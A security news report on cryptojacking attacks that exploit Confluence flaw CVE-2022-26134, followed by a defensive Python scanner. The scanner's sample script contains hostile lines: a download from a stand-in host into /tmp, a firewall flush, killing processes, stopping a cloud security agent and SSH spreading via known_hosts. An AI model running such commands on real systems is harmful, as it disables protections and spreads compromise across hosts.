A now-patched critical security flaw affecting Atlassian Confluence Server that came to light a few months ago is being actively exploited for illicit cryptocurrency mining on unpatched installations.
“If left unremedied and successfully exploited, this vulnerability could be used for multiple and more malicious attacks, such as a complete domain takeover of the infrastructure and the deployment of information stealers, remote access trojans (RATs), and ransomware,” Trend Micro threat researcher Sunil Bharti said in a report.
The issue, tracked as CVE-2022-26134 (CVSS score: 9.8), was addressed by the Australian software company in June 2022.
In one of the infection chains observed by the cybersecurity company, the flaw was leveraged to download and run a shell script (“ro.sh”) on the victim’s machine, which, in turn, fetched a second shell script (“ap.sh”).
The malicious code is designed to update the PATH variable to include additional paths such as “/tmp”, download the cURL utility (if not already present) from a remote server, disable the iptables firewall, abuse the PwnKit flaw (CVE-2021-4034) to gain root privileges, and ultimately deploy the hezb crypto miner.
Like other cryptojacking attacks, the shell script also terminates competing coin miners and disables cloud service provider agents from Alibaba and Tencent before carrying out lateral movement via SSH.
Lacework’s analysis further shows that the command-and-control (C2) server used to retrieve the cURL software as well as the hezb miner also distributed a Golang-based ELF binary named “kik” that allows the malware to kill processes of interest.
Users are advised to prioritize patching the flaw as it could be abused by threat actors for other nefarious purposes.
“Attackers may take advantage of injecting their own code for interpretation and gain access to the Confluence domain being targeted, as well as conduct attacks ranging from controlling the server for subsequent malicious activities to damaging the infrastructure itself,” Bharti said.
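As an added defensive illustration (not code from the report or from the researchers cited above), the following Python scanner turns the behaviours described for the second-stage script into line-level checks a responder could run over a recovered shell script. The regexes, the sample script and the agent/process names are assumptions made for this example, not indicators published in the report.

```python
import re
from typing import Dict, List

# Behaviours the article attributes to the second-stage script (ap.sh),
# expressed as regexes applied per line. Patterns and names are assumptions
# for this example, not indicators taken from the report.
BEHAVIOUR_PATTERNS: Dict[str, re.Pattern] = {
    "path_prepends_tmp": re.compile(r"\bPATH=.*(?:/tmp|/dev/shm)\b"),
    "fetches_curl_binary": re.compile(r"\b(?:wget|curl)\b[^|;&]*\bcurl\b"),
    "disables_firewall": re.compile(
        r"\biptables\s+-F\b|\bsystemctl\s+(?:stop|disable)\s+(?:iptables|firewalld)\b|\bufw\s+disable\b"),
    "privilege_escalation_pwnkit": re.compile(r"\bpkexec\b|CVE-2021-4034", re.I),
    "kills_competing_processes": re.compile(r"\b(?:pkill|killall)\b|\bkill\s+-9\b"),
    "removes_cloud_agents": re.compile(r"\b(?:AliYunDun|aegis|YunJing|barad_agent)\b", re.I),
    "ssh_lateral_movement": re.compile(
        r"\.ssh/(?:known_hosts|id_rsa|authorized_keys)|\bssh\s+-o\s*StrictHostKeyChecking"),
}

def scan_script(script: str) -> Dict[str, List[int]]:
    """Return {behaviour: [1-based line numbers]} for every pattern that matched."""
    findings: Dict[str, List[int]] = {}
    for lineno, line in enumerate(script.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue  # blank lines and comments carry no executable behaviour
        for name, pattern in BEHAVIOUR_PATTERNS.items():
            if pattern.search(stripped):
                findings.setdefault(name, []).append(lineno)
    return findings

def looks_like_cryptojacking_stage(findings: Dict[str, List[int]], threshold: int = 3) -> bool:
    """Flag a script once it shows at least `threshold` distinct described behaviours."""
    return len(findings) >= threshold

# Constructed sample mimicking the described stages; it is NOT the real ap.sh.
SAMPLE_SCRIPT = """#!/bin/sh
export PATH=$PATH:/tmp:/usr/local/bin
wget -q http://example.invalid/curl -O /tmp/curl && chmod +x /tmp/curl
iptables -F
pkill -9 -f minerd
systemctl stop aegis
# PwnKit (CVE-2021-4034) stage deliberately omitted from this sample
for h in $(cut -d, -f1 ~/.ssh/known_hosts); do ssh -o StrictHostKeyChecking=no "$h" uptime; done
"""

if __name__ == "__main__":
    result = scan_script(SAMPLE_SCRIPT)
    for behaviour, lines in result.items():
        print(f"{behaviour}: lines {lines}")
    print("cryptojacking stage:", looks_like_cryptojacking_stage(result))
```

The PwnKit check stays unmatched on the sample because the only reference is in a comment, which the scanner skips; the threshold-based verdict still triggers on the remaining behaviours.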